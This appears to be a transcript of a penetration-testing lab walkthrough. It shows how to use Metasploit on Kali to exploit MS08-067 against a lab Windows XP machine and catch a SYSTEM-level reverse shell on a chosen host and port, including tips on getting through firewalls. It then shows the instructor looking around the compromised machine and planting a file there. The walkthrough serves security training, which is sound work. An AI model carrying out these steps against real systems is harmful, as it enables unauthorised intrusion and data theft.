So, now that we've gone through our reconnaissance, our scanning and enumeration, we're ready to try to throw an attack and gain access. Based on our scanning and enumeration, we've identified a vulnerability to attack. In our case, it's gonna be our Windows machine with the Microsoft MS08-067 vulnerability. So, let's launch our Kali machine. We still have all the machines up and running from our previous lab. So, from our Kali prompt, we're gonna start the Metasploit Framework, which is msfconsole.

Now, from the Metasploit Framework, we're gonna be able to configure our exploit and our payload that we want to send over. So as you can see here, there's over 1,500 exploits, over 400 payloads, so we need to figure out which one we want to use. Now, based on our reconnaissance and our scanning and enumeration, we're gonna use the ms08_067 vulnerability.
Now, this vulnerability goes against Windows XP and Windows 2000 servers, and these will actually go against the file sharing capability, and we know that they were running file sharing on port 445. So, when I search for that, you'll find it right here. It's in the exploit/windows/smb directory, and it is the ms08_067_netapi. I'm gonna copy that so I don't have to type it out each time, and I'm just gonna type in use, and then paste it in and hit enter.

The second thing I need to do is set my payload. Now, the payload is, once we've broken down the door with the exploit, what code do we want them to run? In our case, we want them to run the windows/shell/reverse_tcp. Now, that payload is set. So now, we have a couple more options. We're gonna do show options, and you'll see here that we need a remote host, which is the target we're going after, and a listening host, which is the listening we're gonna do, which in our case is gonna be the Kali machine. So, we're gonna do set RHOST to the IP of the Windows machine, which was 192.168.56.100.
Then we need to set our listening host to our IP for our Kali machine, which was 192.168.56.102, and now we can show our options to verify those options took, and you can see they did. There is our Windows machine IP, and there is our listening host for our Kali machine.

Now, the reason why we're allowed to set this listening host is because in an exploit, I may be the one who is setting the exploits, but I don't want to do all the post-exploit exploitation, and I'll allow my friend to do that. So, for instance, if there were two of us in this room, I might be 102, he might be 103. I'll throw the exploit, the answer that comes back will be to his machine so he can then do all the information gathering, and that way, I might be the guy who breaks down the door, and I have a team of guys who take the information out. The other thing you want to note here is this listening port, which is currently set to 4444. That's the default for Metasploit. It doesn't have to be 4444, though.
You can set it to 80, or 443, or any other port you need to help you get through and back through a firewall. Now that we've set up all of our configurations, all we have to do to run this exploit is type the word exploit.

And you can see that we've started the reverse handler on our Kali machine, which is our Kali machine listening on port 4444. It then goes out and sends the exploit on port 445, which was the vulnerability we were trying to trigger, to the Windows machine. It detected that that was a Service Pack 3 Windows XP machine, and based on that, it threw the appropriate vulnerability and the appropriate exploit for that vulnerability. It then sent an encoded stage dropper over to that machine, and that encoded stage was then received, broke in, used the Command Shell, and sent it back to me, and so now I can see that. That it went from my Kali machine to the Windows machine, and that is the connection that we have open right now. And, notice where we are. We're in the System32 directory in Windows.
We have now been dropped into the command prompt of Windows, and we are there as a system level user. So, we have the ability to create files, edit files, delete files, or run any other commands that we would using the command prompt as if we were there locally on the machine. So, what we're gonna do here is we're gonna start gathering some information. So, why don't we start with something like system information.

And what we can see here is a bunch of information about this machine. We can see the exact version it is, we can see what kind of machine it is, is it part of a domain or just a workstation. This is important to know because if I broke into a machine that was part of a domain, I would then try to go from gaining system on this particular machine to being a domain admin, and continue to elevate my privileges.
I can see information such as the proc ID, the date and time it was installed, how long it's been up, how many processors it has, how much memory it has, how much hard disk it has, all sorts of information that could be useful to me. The other thing I can see here is everything that it's been patched for. In this case, the only patch it has is this one particular one, Q147222, which means that it's Service Pack 3. None of the other updates have been applied, so this means that there's a lot of vulnerabilities on this box that I can then go and attack, which is good for us as a training opportunity, but if I was the one who owned this box, I would know, "Hey, there's a lot of things that I gotta do to get this up to shape."

So, what are some other things we can do? Well, let's go ahead and look around this drive. Let's go to the C drive. We'll go to the main root directory of the C drive, and we'll see what's there. Right now, it just looks like a basic Windows machine.
We can even go into their Documents and Settings and see if there's anything there. In this case, we see there's a user, John Sim. And you can see that we're able to access John's information, because again, we're a system level user. Now, he doesn't happen to have anything on there. Why? Because when we set this box up, we didn't put anything there for us to find. We just set up a basic default blank account, but we can now start writing things to John. For instance, we might do something like this: echo "Hi, John, I hacked your machine!" and then we're gonna pipe that over to a file called Hacked.txt, and hit enter.

So, now that file should be sitting there on the Desktop, which we can see it is. Now, if that file was there before, we would be able to see it by typing that file to the screen. So, in our case, we would type Hacked.txt, and we could see what the contents of that file are. Now, if we're John on our machine, what do we think we're gonna see?
Well, on his desktop now, we have a hacked file, and we can see that, and that is just proof that we were able to break into his machine. Now, if he had a bunch of information on here, we'd be able to steal that information as well, but in this case, in this machine there wasn't much there.

So, once we're done with that machine, we would just type exit to get out of the command prompt, and that will actually break the connection between us and that machine, as well. And then hit Control-C. Abort the session? Yes. And that's the basics of how to hack into a Windows box using the ms08_067 vulnerability.